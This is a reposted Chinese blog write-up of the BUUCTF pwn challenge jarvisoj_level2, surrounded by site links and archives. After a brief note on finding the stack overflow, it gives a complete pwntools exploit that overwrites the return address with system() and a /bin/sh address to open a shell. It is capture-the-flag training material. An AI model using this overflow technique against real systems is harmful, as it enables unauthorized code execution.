【BUUCTF - PWN】jarvisoj_level2 - 代码天地

【BUUCTF - PWN】jarvisoj_level2

其他 2020-04-13 21:23:33 阅读次数: 0

checksec一下，栈溢出

IDA打开看看，很容易找到溢出点，/bin/sh字符串程序里也有现成的

from pwn import *
from LibcSearcher import *

context.os='linux'
context.arch='i386'
context.log_level='debug'

sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)

io=remote('xxx',xxx)

binsh=0x804a024
system=0x8048320

ru(':')
payload=p32(0)*35+p32(system)+p32(0)+p32(binsh)
sl(payload)

io.interactive()

附件：jarvisoj_level2

发布了30 篇原创文章 · 获赞 9 · 访问量 7382

私信关注

猜你喜欢

转载自blog.csdn.net/tqydyqt/article/details/105321659

【BUUCTF - PWN】jarvisoj_level2

BUUCTF jarvisoj_level2

[BUUCTF]PWN——jarvisoj_level2_x64

【BUUCTF - PWN】jarvisoj_level0

[BUUCTF]PWN--------jarvisoj_level4

[BUUCTF]PWN——jarvisoj_level1

[BUUCTF]PWN——jarvisoj_level5

[BUUCTF]PWN——jarvisoj_level3

[BUUCTF]PWN——jarvisoj_level3_x64

BUUCTF(pwn) jarvisoj_level4 栈溢出,泄露libc

[BUUCTF]PWN——jarvisoj_fm

BUUCTF jarvisoj_level0

[BUUCTF]PWN——jarvisoj_tell_me_something

BUUCTF(2)

buuctf jarvisoj_fm

buuctf --pwn part2

【BUUCTF - PWN】babyrop

【BUUCTF - PWN】rip

buuctf-pwn babyrop

BUUCTF(Pwn) rip

buuctf pwn（1~4）

buuctf pwn（13~16）

buuctf pwn（5~8）

buuctf pwn （17~20）

buuctf pwn（9~12）

buuctf pwn （21~24）

【BUUCTF - PWN】PWN5

【BUUCTF - PWN】ciscn_2019_en_2

BUUCTF-PWN刷题记录-2

BUUCTF-pwn2_sctf_2016

今日推荐

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

周排行

Metasploit文件目录与入侵基本概念

跨域(CORS)请求问题[No 'Access-Control-Allow-Origin' header is present on the requested resource]常见解决方案

CodeIgniter 源码解读之 CodeIgniter.php（二）

SAS入门之（四）改变数据类型

初识元组

[数学建模]数学建模算法和模型（B站视频）（二）

Nginx 服务器源码安装配置流程

C#实现语音视频录制【基于MCapture + MFile】

开发进度4

下载安装vue的方法网址

每日归档

更多

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)